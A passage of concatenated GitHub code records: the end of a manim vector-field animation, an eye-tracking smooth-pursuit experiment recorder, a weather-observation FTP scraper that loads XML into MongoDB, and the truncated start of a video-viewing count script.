).set_color_by_gradient(\n *self.default_vector_field_config[\"colors\"]\n )\n d2_field_text.to_corner(UR,buff=.5)\n \n d2_field = self.get_vector_field(\n lambda v: np.array([\n -v[1],\n v[0],\n 0\n ]),\n )\n self.add_fixed_in_frame_mobjects(d2_field_text)\n # self.add(d2_field)\n self.play(Write(d2_field_text))\n self.play(FadeIn(d2_field))\n \n self.d2_field=d2_field\n self.d2_field_text=d2_field_text\n \n def show_3d_field(self):\n d3_field_text=TexMobject(\n r\"\\vec F(x,y,z)=-y\\hat i+x\\hat j+0 \\hat k\",\n stroke_width=1.5\n ).set_color_by_gradient(\n *self.default_vector_field_config[\"colors\"]\n )\n d3_field_text.to_corner(UR,buff=.5)\n \n d3_field= self.get_vector_field(\n lambda v: np.array([\n -v[1],\n v[0],\n 0\n # v[0]*v[2]\n ]),\n z_min=-2,\n z_max= 2,\n delta_x= 1,\n delta_y= 1,\n delta_z= 1,\n length_func=lambda norm : .5*sigmoid(norm),\n opacity= 1,\n ThreeD=True\n )\n \n self.remove(self.d2_field,self.d2_field_text)\n self.add_fixed_in_frame_mobjects(d3_field_text)\n # self.add(d3_field)\n self.play(Write(d3_field_text))\n self.play(FadeIn(d3_field))\n \n def get_vector_field(self,func,ThreeD=False,**kwargs):\n config = dict()\n config.update(self.default_vector_field_config)\n config.update(kwargs)\n if ThreeD:\n vector_field= VectorField3D(func,**config)\n else:\n vector_field= VectorField(func,**config)\n \n vector_field.move_to(self.axes.c2p(0,0,0))\n self.vector_field=vector_field\n \n return vector_field\n \n \n\n#------------------------------------------------------- \n #customize 3D axes \n def get_three_d_axes(self, include_labels=True, include_numbers=False, **kwargs):\n config = dict(self.axes_config)\n config.update(kwargs)\n axes = ThreeDAxes(**config)\n axes.set_stroke(width=2)\n self.axes=axes\n \n if include_numbers:\n self.add_axes_numbers(axes)\n\n if include_labels:\n self.add_axes_labels(axes)\n\n # Adjust axis orientation\n axes.x_axis.rotate(\n -0 * DEGREES, LEFT,\n about_point=axes.c2p(0, 0, 0),\n )\n axes.y_axis.rotate(\n 0 * DEGREES, UP,\n about_point=axes.c2p(0, 0, 0),\n )\n \n return axes\n \n \n def setup_axes(self):\n axes = self.get_three_d_axes(include_labels=True)\n axes.scale(1)\n # axes.center()\n axes.shift(axes.axes_shift)\n\n self.add(axes)\n self.axes = axes\n \n def add_axes_numbers(self, axes):\n x_axis = axes.x_axis\n y_axis = axes.y_axis\n tex_vals_x = [\n \n (\"1\", axes.b),\n ]\n tex_vals_y=[\n \n (\"1\", axes.d)\n ]\n x_labels = VGroup()\n y_labels = VGroup()\n for tex, val in tex_vals_x:\n label = TexMobject(tex)\n label.scale(1)\n label.next_to(x_axis.n2p(val), DOWN)\n # label.rotate(180 * DEGREES)\n x_labels.add(label)\n x_axis.add(x_labels)\n x_axis.numbers = x_labels\n\n for tex, val in tex_vals_y:\n label = TexMobject(tex)\n label.scale(1)\n label.next_to(y_axis.n2p(val), LEFT)\n label.rotate(90 * DEGREES)\n y_labels.add(label)\n \n y_axis.add(y_labels)\n y_axis.numbers = y_labels\n \n return axes\n \n def add_axes_labels(self, axes):\n x_label = TexMobject(\"x\")\n x_label.next_to(axes.x_axis.get_end(), RIGHT)\n axes.x_axis.label = x_label\n\n y_label = TextMobject(\"y\")\n y_label.rotate(90 * DEGREES, OUT)\n y_label.next_to(axes.y_axis.get_end(), UP)\n axes.y_axis.label = y_label\n\n z_label = TextMobject(\"z\")\n z_label.rotate(90 * DEGREES, RIGHT)\n z_label.next_to(axes.z_axis.get_zenith(), LEFT)\n axes.z_axis.label = z_label\n for axis in axes:\n axis.add(axis.label)\n return axes\n \n#-----------------------------------------------------------\n \nclass VectorField3D(VGroup):\n CONFIG = {\n \"delta_x\": 1,\n \"delta_y\": 1,\n \"delta_z\": 1,\n \"x_min\": int(np.floor(-FRAME_WIDTH / 2)),\n \"x_max\": int(np.ceil(FRAME_WIDTH / 2)),\n \"y_min\": int(np.floor(-FRAME_HEIGHT / 2)),\n \"y_max\": int(np.ceil(FRAME_HEIGHT / 2)),\n \"z_min\":-1,\n \"z_max\": 1,\n \"min_magnitude\": 0,\n \"max_magnitude\": 4,\n \"colors\": DEFAULT_SCALAR_FIELD_COLORS,\n # Takes in actual norm, spits out displayed norm\n \"length_func\": lambda norm: 0.45 * sigmoid(norm),\n \"opacity\": 1.0,\n \"vector_config\": {},\n }\n '''Position of the tip of vector to be fixed'''\n def __init__(self, func, **kwargs):\n VGroup.__init__(self, **kwargs)\n self.func = func\n self.rgb_gradient_function = get_rgb_gradient_function(\n self.min_magnitude,\n self.max_magnitude,\n self.colors,\n flip_alphas=False\n )\n x_range = np.arange(\n self.x_min,\n self.x_max + self.delta_x,\n self.delta_x\n )\n y_range = np.arange(\n self.y_min,\n self.y_max + self.delta_y,\n self.delta_y\n )\n z_range = np.arange(\n self.z_min,\n self.z_max + self.delta_z,\n self.delta_z\n )\n for x, y, z in it.product(x_range, y_range, z_range):\n point = x * RIGHT + y * UP + z * OUT\n # print(point)\n self.add(self.get_vector(point))\n self.set_opacity(self.opacity)\n\n def get_vector(self, point, **kwargs):\n output = np.array(self.func(point))\n norm = get_norm(output)\n if norm == 0:\n output *= 0\n else:\n output *= self.length_func(norm) / norm\n # norm=np.linalg.norm(output)\n vector_config = dict(self.vector_config)\n vector_config.update(kwargs)\n \n vect = Vector(\n output,\n **vector_config\n )\n vect_perp=vect.copy().rotate(PI/2, axis=output)\n vect= VGroup(vect,vect_perp)\n # vect= self.position_vector(vect,point,output,norm)\n vect.shift(point)\n fill_color = rgb_to_color(\n self.rgb_gradient_function(np.array([norm]))[0]\n )\n vect.set_color(fill_color)\n return vect\n \n '''def position_vector(self,vect,point,output,norm):\n theta,phi=self.get_theta_phi(output,norm)\n vect.rotate(PI-phi, axis=RIGHT)\n vect.rotate(theta, axis=IN)\n # or apply rotation matrix?\n return vect\n \n def get_theta_phi(self,output,norm):\n if norm==0:\n phi,theta=0,0\n else:\n phi= np.arccos(output[-1]/norm)\n if output[0]!=0:\n theta= np.arccos(output[0]/(norm*np.sin(phi)))\n else:\n theta= 0\n return phi,theta'''\n \n \n \n #uploaded by Somnath Pandit. FSF2020_Vector_fields\n \n \n \n","repo_name":"FOSSEE/FSF-mathematics-python-code-archive","sub_path":"FSF-2020/calculus-of-several-variables/integrals-of-multivariable-functions/vector-fields/file1_vector_fields.py","file_name":"file1_vector_fields.py","file_ext":"py","file_size_in_byte":10019,"program_lang":"python","lang":"en","doc_type":"code","stars":86,"dataset":"github-code","pt":"82"} +{"seq_id":"2783845532","text":"# This code is for recording eye tests with a 6-sensor eye tracking system.\r\n# It presents the user with a dot that moves back and forth along a line\r\n# for the user to follow with their eyes, stopping at each end of the line until\r\n# the user presses Enter to continue (the start/end coordinates of the line can\r\n# be set below).\r\n#\r\n# Two sub-processes are created:\r\n# 1) dot_process:\r\n# Handles the animation, dot data recording, user input. Saves timestamped\r\n# dot coordinates in the dot_df dataframe then as a csv file before returning.\r\n# 2) sensor_process:\r\n# records sensor data from a serial connection. Stores raw data as strings\r\n# for faster sampling, then when test is completed, can verify each line as\r\n# valid before saving as a csv file. The expected line is 6 comma-separated\r\n# numeric values, eg:\r\n#\r\n# \",,,,,\\r\\n\"\r\n#\r\n# (carriage return is optional.)\r\n#\r\n# After the test, the main process re-opens the saved files and plots them to confirm\r\n# the data was recorded as intended.\r\n# Several settings can be changed: see the USER SETTINGS section below for more\r\n# details.\r\n#\r\n# Data files are saved in the directory:\r\n#\r\n# ./test_data\r\n#\r\n# It will be created if it doesn't exist. Note if on Linux: this code must be run\r\n# by superuser so superuser will also be needed to delete this directory,\r\n# as well the files created by this program.\r\n\r\nimport matplotlib.pyplot as plt\r\nimport numpy as np\r\nfrom matplotlib.animation import FuncAnimation\r\nimport os\r\nimport serial\r\nimport sys\r\nfrom multiprocessing import Process, Pipe\r\nfrom datetime import datetime\r\nimport keyboard\r\nimport time\r\nimport pandas as pd\r\nimport signal\r\n\r\n#################\r\n# USER SETTINGS #\r\n\r\n#################\r\nnum_repeat = 1\r\n# number of times the dot will move forward and backwards\r\nnum_dot_positions = 150 # Number of dot positions along the line (also determines speed).\r\ndot_start_x = 0 # dot start and stop locations. Should be between 0 and axes_lim.\r\ndot_stop_x = 8\r\n\r\ndot_start_y = 4\r\ndot_stop_y = 4\r\n\r\nconfirm_data = True # Boolean. Display saved data after the test.\r\nrecord_sensors = True # Boolean. Record sensors (or just dot data).\r\nprocess_sensor_data = True # Boolean. Validate sensor data/save as csv, or: don't validate, save as .txt\r\nserial_port = 'COM8'\r\nbaud_rate = 1000000\r\ndir_char = '/' # Directory character for filepath, will be automatically reset for Windows.\r\n# set and forge\r\nblit = True\r\nmarkersize = 7\r\naxes_lim = 8\r\ndata_folder = 'test_data'\r\ndot_df_columns = ['timestamp', 'dot_x', 'dot_y']\r\nsensor_df_columns = ['timestamp', 'LL', 'LC', 'LR', 'RL', 'RC', 'RR']\r\n\r\n######################\r\n# INTERNAL VARIABLES #\r\n######################\r\nexit_state = 0\r\nuser_input = False # stores user input (True), should be reset to False at each side of screen.\r\ndot_coords = np.empty((0, 0)) # contains all dot coords used in test.\r\ncoords_index = 0\r\ndot_df = pd.DataFrame(columns=dot_df_columns)\r\nrec_stop_points = []\r\nstop_point_i = 0\r\nanim_setup = 0 # Sets return after first anim call, so plot is drawn while waiting for user input. Init to True.\r\nsetup_frames = 5 # this istartup buffer is needed to display animation before starting test.\r\nfilepath = \"\"\r\ndot_process = None # Sub-processes that will be used.\r\nsensor_process = None\r\nsensor_filepath = \"\"\r\ndot_PID = None\r\nsensor_PID = None\r\n#############\r\n# FUNCTIONS #\r\n#############\r\n\r\n# Handle SIGINT (Ctrl-C from user, used to exit)\r\ndef SIGINT_handler(signum, frame):\r\n global dot_process, sensor_process, record_sensors, dot_PID, sensor_PID\r\n\r\n if dot_process.is_alive():\r\n dot_process.terminate()\r\n if record_sensors:\r\n if sensor_process.is_alive():\r\n sensor_process.terminate()\r\n print('\\n Processes terminated. Goodbye.\\n')\r\n exit()\r\n\r\n# Re-import and plot data files after test to check data was recorded correctly.\r\ndef post_test_check(dot_filepath, sensor_filepath):\r\n\r\n subplots = {}\r\n\r\n #import dot dataset\r\n dotCheck_df = pd.read_csv(dot_filepath)\r\n dotCheck_df['timestamp'] = pd.to_datetime(dotCheck_df['timestamp'])\r\n\r\n # check if sensors were recorded\r\n n_subplots = 2\r\n if \"csv\" in sensor_filepath:\r\n n_subplots = 4\r\n sensorCheck_df = pd.read_csv(sensor_filepath)\r\n sensorCheck_df['timestamp'] = pd.to_datetime(sensorCheck_df['timestamp'])\r\n # create plots\r\n fig = plt.figure()\r\n for i in range(n_subplots):\r\n subplots[i] = fig.add_subplot(2 ,2, i+1)\r\n # Finalise dot data plots\r\n subplots[0].set_title('Dot Data', fontsize=16, fontweight='bold')\r\n subplots[1].set_title('Dot Data FPS', fontsize=16, fontweight='bold')\r\n subplots[0].scatter(dotCheck_df[dot_df_columns[0]], dotCheck_df[dot_df_columns[1]], label=dot_df_columns[1])\r\n subplots[0].scatter(dotCheck_df[dot_df_columns[0]], dotCheck_df[dot_df_columns[2]], label=dot_df_columns[2])\r\n subplots[1].plot(dotCheck_df['timestamp'], [1000000/time.microseconds for time in dotCheck_df['timestamp'].diff()])\r\n subplots[1].set_xlim(subplots[0].get_xlim())\r\n subplots[0].legend()\r\n subplots[0].grid()\r\n subplots[1].grid()\r\n # sensor plots\r\n if n_subplots == 4:\r\n subplots[2].set_title('Sensor Data', fontsize=16, fontweight='bold')\r\n subplots[3].set_title('Sensor Sample Freq', fontsize=16, fontweight='bold')\r\n for sensor in sensorCheck_df.columns[1:]:\r\n subplots[2].plot(sensorCheck_df['timestamp'], sensorCheck_df[sensor], label = sensor)\r\n subplots[3].plot(sensorCheck_df['timestamp'], [1000000/time.microseconds for time in sensorCheck_df['timestamp'].diff()])\r\n subplots[2].legend()\r\n subplots[2].set_xlim(subplots[0].get_xlim())\r\n subplots[3].set_xlim(subplots[0].get_xlim())\r\n subplots[2].grid()\r\n subplots[3].grid()\r\n subplots[2].set_ylabel('mV')\r\n subplots[3].set_ylabel('Hz')\r\n\r\n fig.tight_layout()\r\n # format and show figure\r\n figManager = plt.get_current_fig_manager()\r\n figManager.window.showMaximized()\r\n plt.show()\r\n\r\n\r\n# MAIN FUNCTION OF DOT PROCESS\r\ndef dot_run(dot_to_main, dot_to_sensor, dot_from_sensor):\r\n global dot_coords, record_sensors\r\n\r\n # send PID\r\n dot_to_main.send(os.getpid())\r\n\r\n ### PROCESS FUNCTIONS ###\r\n\r\n def save_dot_csv():\r\n # save .csv file\r\n if not os.path.exists(data_folder):\r\n os.makedirs(data_folder)\r\n savetime = datetime.now().strftime('%Y-%m-%dT%H%M%S')\r\n filename = 'dot_data_%d_%d_%d_%d_%s.csv' % (dot_start_x, dot_start_y, dot_stop_x, dot_stop_y, savetime)\r\n dot_df.to_csv(data_folder + dir_char + filename, header=True, index=False)\r\n\r\n return data_folder + dir_char + filename\r\n\r\n # animation loop function\r\n def ani(frame):\r\n global exit_state, user_input, coords_index, dot_coords, coords_index\r\n global rec_stop_points, stop_point_i, anim_setup, setup_frames, filepath\r\n\r\n\r\n # takes a few frames to set up figure\r\n if frame < setup_frames:\r\n return [point, message]\r\n\r\n # EXIT SEQUENCE\r\n # 1) save data, signal sensor process to stop, display exit message.\r\n if exit_state == 1:\r\n filepath = save_dot_csv()\r\n dot_to_sensor.send(filepath)\r\n if confirm_data:\r\n exit_message = \"Test Completed.\\n\\n\" +\\\r\n (\"Dot data saved as:\\n%s\\n\\n\" % filepath) +\\\r\n \"Press Enter to close window and view data . . .\\n(may take some time)\"\r\n else:\r\n exit_message = \"Test Completed\\n\\n\" +\\\r\n \"Data confirmation turned off.\\n\\n\" +\\\r\n \"Press Enter to Quit.\"\r\n message.set_text(exit_message)\r\n exit_state = exit_state + 1\r\n point.set_color('white')\r\n return [point, message]\r\n # 2) wait for user confirmation then close animation\r\n if exit_state == 2:\r\n keyboard.wait('Enter')\r\n plt.close()\r\n return [point, message]\r\n\r\n # DURING TEST: wait for user input\r\n if user_input == False:\r\n keyboard.wait('Enter')\r\n user_input = True\r\n point.set_color('lime')\r\n return [point, message]\r\n\r\n # Record current dot coords (set on startup or by last loop).\r\n if coords_index < dot_coords.shape[0]:\r\n dot_df.loc[coords_index] = [datetime.now(), dot_coords[coords_index][0], dot_coords[coords_index][1]]\r\n\r\n # All dot coords used: trigger exit sequence.\r\n if coords_index == dot_coords.shape[0] - 1:\r\n exit_state = exit_state + 1\r\n return [point, message]\r\n\r\n # Dot has reached side of screen on last update: reset user_input and return.\r\n if coords_index in rec_stop_points:\r\n rec_stop_points.remove(coords_index)\r\n user_input = False\r\n point.set_color('white')\r\n stop_point_i = (stop_point_i + 1) % 2\r\n return [point, message]\r\n\r\n # Side of screen not reached: increment coords_index, update dot position, return.\r\n coords_index = coords_index + 1\r\n point.set_data([dot_coords[coords_index][0]],[dot_coords[coords_index][1]])\r\n return [point]\r\n\r\n ### END dot_run PROCESS FUNCTION DEFINITIONS ###\r\n\r\n # populate dot_coords with all required dot x and y coordinates\r\n for i, dot_axis in enumerate([[dot_start_x, dot_stop_x], [dot_start_y, dot_stop_y]]):\r\n # create complete dot coordnates for dot_axis (x or y)\r\n coords_start = np.linspace(dot_axis[0], dot_axis[0], int(num_dot_positions/4))\r\n coords_forward = np.linspace(dot_axis[0], dot_axis[1], num_dot_positions)\r\n coords_terminal = np.linspace(dot_axis[1], dot_axis[1], int(num_dot_positions/4))\r\n coords_backward = np.linspace(dot_axis[1], dot_axis[0], num_dot_positions)\r\n coords = np.concatenate([coords_start, coords_forward, coords_terminal, coords_backward])\r\n coords = np.tile(coords, num_repeat)\r\n # add to dot_coords\r\n dot_coords = dot_coords.reshape((i, len(coords)))\r\n dot_coords = np.vstack((dot_coords, coords))\r\n # transpose dot_coords\r\n dot_coords = dot_coords.T\r\n\r\n # calculate recording stop points\r\n for i in range(num_repeat):\r\n repeat_interval = 2*int(num_dot_positions/4) + 2*num_dot_positions\r\n rec_stop_points.append(int(num_dot_positions/4) + num_dot_positions + i*repeat_interval)\r\n rec_stop_points.append(2*int(num_dot_positions/4) + 2*num_dot_positions + i*repeat_interval)\r\n\r\n # wait for sensor process to confirm connection\r\n if record_sensors:\r\n while not dot_from_sensor.poll():\r\n time.sleep(0.01)\r\n print(\"\\n %s\\n\" % dot_from_sensor.recv())\r\n\r\n # Create and initialise animation plot\r\n fig = plt.figure(facecolor='black')\r\n axes = fig.add_subplot(111, autoscale_on=False)\r\n axes.set_xlim(0-0.01*axes_lim, 8+0.01*axes_lim)\r\n axes.set_ylim(0-0.01*axes_lim, 8+0.01*axes_lim)\r\n axes.get_xaxis().set_ticks([])\r\n axes.get_yaxis().set_ticks([])\r\n fig.set_size_inches(18.5, 10.5, forward=True)\r\n axes.set_facecolor('black')\r\n point, = axes.plot([dot_start_x],[dot_start_y], 'wo', animated=blit, markersize=markersize)\r\n message = axes.text(axes_lim/2, axes_lim/2, '', fontsize=20, fontweight='bold', color='white', ha='center', va='center', zorder=10)\r\n\r\n # create animation\r\n animation = FuncAnimation(fig, ani, interval=200, blit=blit, repeat=False)\r\n # format display\r\n fig.tight_layout() #reduce margins\r\n figManager = plt.get_current_fig_manager()\r\n figManager.window.showMaximized()\r\n plt.show()\r\n\r\n # Animation over: send filepath, finish process\r\n dot_to_main.send(filepath)\r\n return\r\n\r\n# MAIN FUNCTION OF SENSOR PROCESS\r\ndef sensor_record(sensor_from_dot, sensor_to_main, sensor_to_dot):\r\n\r\n # send PID\r\n sensor_to_main.send(os.getpid())\r\n\r\n ### PROCESS VARIABLES ###\r\n data = []\r\n timestamps = []\r\n\r\n # create serial connection\r\n print('\\n Connecting to serial device . . .')\r\n ser = serial.Serial(serial_port, baud_rate, timeout=1)\r\n # read lines until reading syncs, notify dot_process when connected.\r\n header_i = 200\r\n while header_i > 0:\r\n raw_data = ser.readline()\r\n header_i = header_i - 1\r\n # Confirm stable connection with dot_process\r\n sensor_to_dot.send(\"Serial device connected.\")\r\n\r\n # read data until signalled to stop\r\n while not sensor_from_dot.poll():\r\n try:\r\n raw_data = ser.readline()\r\n raw_data = raw_data.decode()\r\n data.append(raw_data)\r\n timestamps.append(datetime.now())\r\n except:\r\n pass\r\n\r\n # message user, get filepath\r\n print('\\n Processing data . . .')\r\n dot_filepath = sensor_from_dot.recv()\r\n sensor_filepath = dot_filepath.replace('dot', 'sensor')\r\n\r\n # Process data: check for valid lines by tring to convert strings to float.\r\n if process_sensor_data:\r\n file = open(sensor_filepath, 'w')\r\n file.write(\"timestamp,LL,LC,LR,RL,RC,RR\\n\")\r\n for i, ts in enumerate(timestamps):\r\n try:\r\n line = data[i].replace('\\n', \"\").replace('\\r', \"\").split(',')\r\n line = \"%f,%f,%f,%f,%f,%f\" % tuple([float(x) for x in line])\r\n file.write(ts.strftime('%Y-%m-%dT%H:%M:%S.%f') + ',' + line + \"\\n\")\r\n except:\r\n pass\r\n file.close()\r\n\r\n # Else data processing turned off: just save raw data text file\r\n else:\r\n sensor_filepath = sensor_filepath.replace(\"csv\", \"txt\")\r\n file = open(sensor_filepath, 'w')\r\n for i, ts in enumerate(timestamps):\r\n line = data[i].replace('\\n', \"\").replace('\\r', \"\")\r\n file.write(ts.strftime('%Y-%m-%dT%H:%M:%S.%f') + ',' + line + \"\\n\")\r\n file.close()\r\n\r\n # Data recording and processing finished, signal main process and return\r\n print(' Data processing completed.\\n Sensor data saved as:\\n %s\\n' % sensor_filepath)\r\n sensor_to_main.send(sensor_filepath)\r\n return\r\n\r\n#######\r\n# RUN #\r\n#######\r\nif __name__=='__main__':\r\n\r\n # reset dir_char if running on Windows\r\n if sys.platform in ['Win32', 'Win64']:\r\n dir_char = '\\\\'\r\n\r\n # Process comms\r\n main_from_dot, dot_to_main = Pipe()\r\n sensor_from_dot, dot_to_sensor = Pipe()\r\n main_from_sensor, sensor_to_main = Pipe()\r\n dot_from_sensor, sensor_to_dot = Pipe()\r\n\r\n # Create and start processes\r\n dot_process = Process(target=dot_run, args=(dot_to_main, dot_to_sensor, dot_from_sensor,))\r\n dot_process.start()\r\n if record_sensors:\r\n sensor_process = Process(target=sensor_record, args=(sensor_from_dot, sensor_to_main, sensor_to_dot,))\r\n sensor_process.start()\r\n\r\n # setup SIGINT_handler: exit using ctrl-C and it will terminate processes.\r\n signal.signal(signal.SIGINT, SIGINT_handler)\r\n\r\n # get and print PIDs\r\n sensor_PID_string = \"\"\r\n dot_PID = main_from_dot.recv()\r\n if record_sensors:\r\n sensor_PID = main_from_sensor.recv()\r\n sensor_PID_string = \"\\n sensor_record process started - PID: %d\" % sensor_PID\r\n print(\"\\n dot_run process started - PID: %d%s\" % (dot_PID, sensor_PID_string))\r\n\r\n # wait for confirmation of data file creation from sub-processes\r\n dot_filepath = main_from_dot.recv()\r\n print('Hey')\r\n if record_sensors:\r\n sensor_filepath = main_from_sensor.recv()\r\n\r\n # terminate sub-processes after all inter-process comms are done\r\n if record_sensors:\r\n sensor_process.terminate()\r\n dot_process.terminate()\r\n print(\" (Sub-processes successfully terminated.)\\n\")\r\n\r\n # confirm data\r\n if confirm_data:\r\n post_test_check(dot_filepath, sensor_filepath)\r\n","repo_name":"LuyaoGuo/NIRSense_eye_tracking","sub_path":"pursuit_code/smoothPursuit_experiment_code.py","file_name":"smoothPursuit_experiment_code.py","file_ext":"py","file_size_in_byte":16099,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"43130168385","text":"import os\nfrom datetime import datetime\nfrom ftplib import FTP\nfrom os import makedirs, stat\nfrom pyexpat import ExpatError\nfrom typing import Optional\nfrom xml.etree.ElementTree import ParseError\n\nimport xmltodict\nfrom dateutil import parser\nfrom decouple import AutoConfig\nfrom pymongo import MongoClient\n\nfrom models import StationDocument, MeasurementDocument\nfrom . import logger\nfrom .conf import MEASUREMENT_ATTRS_MAPPING, MEASUREMENT_ATTRS_TO_SKIP\n\n\nclass SkipFileError(Exception):\n pass\n\nclass Scraper:\n \"\"\"\n Class managing scraping data from given host to given Mongo instance defined by connection.\n \"\"\"\n\n def __init__(\n self,\n config: AutoConfig,\n connection: MongoClient\n ):\n self._config = config\n self._connection = connection\n\n def run_from_local_dir(self):\n local_storage_dir = self._config('LOCAL_STORAGE_DIR')\n\n loaded_measurements = 0\n for root, sub_dirs, files in os.walk(local_storage_dir):\n for file_to_load in files:\n pth = os.path.join(root, file_to_load)\n\n try:\n loaded_measurements += self._try_to_store_from_file(pth=pth)\n logger.info('Loaded %s.', pth)\n except SkipFileError as e:\n logger.warning('Skipping %s due to: %s.', pth, e)\n\n logger.info('Loaded %s measurements.', loaded_measurements)\n\n def run_from_ftp(self):\n local_storage_dir = self._config('LOCAL_STORAGE_DIR')\n\n scraped = self._scrape()\n\n makedirs(local_storage_dir, exist_ok=True)\n\n loaded_measurements = 0\n for f in scraped:\n pth = os.path.join(local_storage_dir, f)\n try:\n loaded_measurements += self._try_to_store_from_file(pth=pth)\n logger.info('Loaded %s.', pth)\n except SkipFileError as e:\n logger.warning('Skipping %s due to: %s.', pth, e)\n\n logger.info('Loaded %s measurements.', loaded_measurements)\n\n def _scrape(self):\n host = self._config('FTP_HOST')\n files_to_scrape = set(self._config('FILES_TO_SCRAPE').split())\n dir_to_scrape = self._config('FTP_DIR')\n local_storage_dir = self._config('LOCAL_STORAGE_DIR')\n\n logger.info('Logging to FTP %s in progress.', host)\n\n with FTP(host=host, ) as ftp:\n ftp.login()\n ftp.cwd(dir_to_scrape)\n\n scraped_files = set()\n ftp.retrlines('NLST', scraped_files.add)\n\n found_to_scrape = scraped_files & files_to_scrape\n\n logger.debug('Found %s files to scrape: %s.', len(files_to_scrape), ','.join(found_to_scrape))\n\n for i, to_scrape in enumerate(found_to_scrape, start=1):\n local_file_pth = os.path.join(local_storage_dir, to_scrape)\n\n last_modified_remote = self.remote_file_last_modified(ftp, to_scrape)\n last_modified_local = self._local_file_last_modified(local_file_pth)\n\n if last_modified_remote and last_modified_local and last_modified_local > last_modified_remote:\n logger.debug(\n 'File %s: %s skipped (last modified difference %s).',\n i, to_scrape, last_modified_local - last_modified_remote\n )\n continue\n\n with open(local_file_pth, 'wb') as local_fp:\n ftp.retrbinary(f'RETR {to_scrape}', local_fp.write)\n\n logger.info('File %s: %s has been scraped.', i, to_scrape)\n return found_to_scrape\n\n @staticmethod\n def remote_file_last_modified(ftp: FTP, file_name: str):\n modified = ftp.voidcmd(f'MDTM {file_name}')[4:].strip()\n\n try:\n return parser.parse(modified)\n except (ValueError, OverflowError):\n return None\n\n @staticmethod\n def _local_file_last_modified(file_name: str):\n try:\n stats = stat(file_name)\n except FileNotFoundError:\n return None\n\n return datetime.fromtimestamp(stats.st_mtime)\n\n def _try_to_store_from_file(self, pth: str) -> int:\n with open(pth, 'rb') as fd:\n content = fd.read()\n\n try:\n return self._store_data(file_content=content.decode())\n except (ParseError, UnicodeDecodeError, ExpatError) as e:\n logger.warning('Skipping %s due to: %s.', pth, e)\n raise SkipFileError from e\n\n def _store_data(self, file_content: str) -> int:\n data = xmltodict.parse(file_content)\n loaded = 0\n\n stations = data.get(\"product\").get(\"observations\").get(\"station\")\n for station_data in stations:\n wmo_id = int(station_data.get(\"@wmo-id\"))\n\n # checking existence of station\n station = self._get_or_create_station(station_data, wmo_id)\n\n period = station_data.get(\"period\")\n time = period.get(\"@time-utc\")\n\n measurement, was_created = self._get_or_create_measurement(time, station)\n\n if not was_created:\n logger.debug('Skipping measurement %s: %s, %s.', wmo_id, station.station_name, time)\n continue\n\n logger.debug('Loading measurement from %s: %s, %s.', wmo_id, station.station_name, time)\n elements = period.get(\"level\").get(\"element\")\n if elements is None:\n break\n\n for element in elements:\n if type(element) == str: # should probably check if element is OrderedDict\n logger.warning('Skipped text element %s.', element)\n break\n\n attr_type = (element.get(\"@type\") or '').replace('-', '_')\n\n if attr_type in MEASUREMENT_ATTRS_TO_SKIP:\n continue\n\n data_type: Optional[callable] = MEASUREMENT_ATTRS_MAPPING.get(attr_type)\n if not data_type:\n logger.warning('Unknown attribute %s.', attr_type)\n continue\n\n setattr(\n measurement,\n attr_type,\n data_type(element)\n )\n\n measurement.save()\n loaded += 1\n return loaded\n\n @staticmethod\n def _get_or_create_measurement(time, station):\n m = MeasurementDocument.objects(station=station, time_period=time)\n if m:\n return m, False\n\n m = MeasurementDocument()\n m.station = station.to_dbref()\n m.time_period = time\n return m, True\n\n @staticmethod\n def _get_or_create_station(data, wmo_id):\n fetched_station = StationDocument.objects(wmo_id=wmo_id)\n if not fetched_station:\n station = StationDocument()\n station.wmo_id = wmo_id\n station.location = data.get(\"@tz\")\n station.station_name = data.get(\"@stn-name\")\n station.station_height = float(data.get(\"@stn-height\"))\n station.latitude = float(data.get(\"@lat\"))\n station.longitude = float(data.get(\"@lon\"))\n station.save()\n else:\n station = fetched_station.first()\n return station\n","repo_name":"thejoeejoee/UPA-MIT-VUT-2020-2021","sub_path":"python/scraper/scraper/scraper.py","file_name":"scraper.py","file_ext":"py","file_size_in_byte":7233,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"14350111249","text":"#######################################################################################################################\n## count Videos \n## Written by: Sijun He\n## Last Modified by: Sijun He\n#######################################################################################################################\n## The code creates a matrix of whether each user has watched each user or not and print it into a csv file\n## Row: each unique User\n## Columns: each courses (courses have been sorted in chronological order)\n#######################################################################################################################\nimport csv, re\nimport numpy as np\nfileName = '../../data/HumanitiesSciences_StatLearning_Winter2016_VideoInteraction.csv'\nwk1 = ['2wLfFB_6SKI','LvaTokhYnDw'] \nwk2 = ['WjyuiK5taS8','UvxHOkYQl8g','VusKAosxxyk','vVj2itVNku4','jwBgGS_4RQA','jk9S3RTAl38']\nwk3 = ['PsE9UqoWtS4','J6AdoiNUyWI','1hbCJyM9ccs','3T6RXmIHbJ4','IFzVxLv0TKQ','5ONFqIk3RFg']\nwk4 = ['sqq21-VIa1c','31Q5FGRnxt4','MpX8rVv_u4E','GavRXXEHGqU','RfrGiG1Hm3M',\n'QG0pVJXT6EU','X4VDZDp2vqw','6FiNGTYAOAA','TxvEVc8YNlU','2cl7JiPzkBY','9TVVF7CS3F4']\nwk5 = ['6l9V1sINzhE','_2ij6eaaSl0','nZAM5OXrktY','S06JpVoNaA0','p4BYWX7PTBM','BzHz0J9a6k0',\n'6dSXlqHAoMk','YVSmsWoBKnA']\nwk6 = ['MEMGOlJxxz0','91si52nk3LA','nLpJd_iKmrE','NJhMSpI2Uj8','LkifE44myLc','3p9JNaJCOb4',\n'cSKzqb0EKS0','A5I1G1MfUmA','xMKVUstjXBE','QlyROnAjnEk','eYxwWGJcOfw','3kwdDGnV8MM','mv-vdysZIb4',\n'F8MMHCCoALU','1REe3qSotx8']\nwk7 = ['gtXQXA7qF3c','7ZIqzTNB8lk','mxXHJa1DsWQ','N2hBXqPiegQ','uQBnDGu6TYU','DCn83aXXuHc']\nwk8 = ['79tR7BvYE6w','6ENTbK3yQUQ','GfPR7Xhdokc','hPEJoITBbQ4','lq_xzBRIWm4','U3MdBNysk9w',\n'0wZUXtvAtDc','IY7oWGXb77o']\nwk9 = ['QpbynqiTCsY','xKsTsGE7KpI','dm32QvCW7wE','mI18GD4_ysE','qhyyufR0930','L3n2VF7yKkk']\nwk10 = ['ipyxSYXgzjQ','dbuSGWCgdzw','aIybuNt9ps4','Tuuc9Y06tAc','yUJcTpWNY_o','lFHISDj_4EQ',\n'YDubYJsZ9iM','4u3zvtfqb7w']\nvideos = wk1 + wk2 + wk3 + wk4 + wk5 + wk6 + 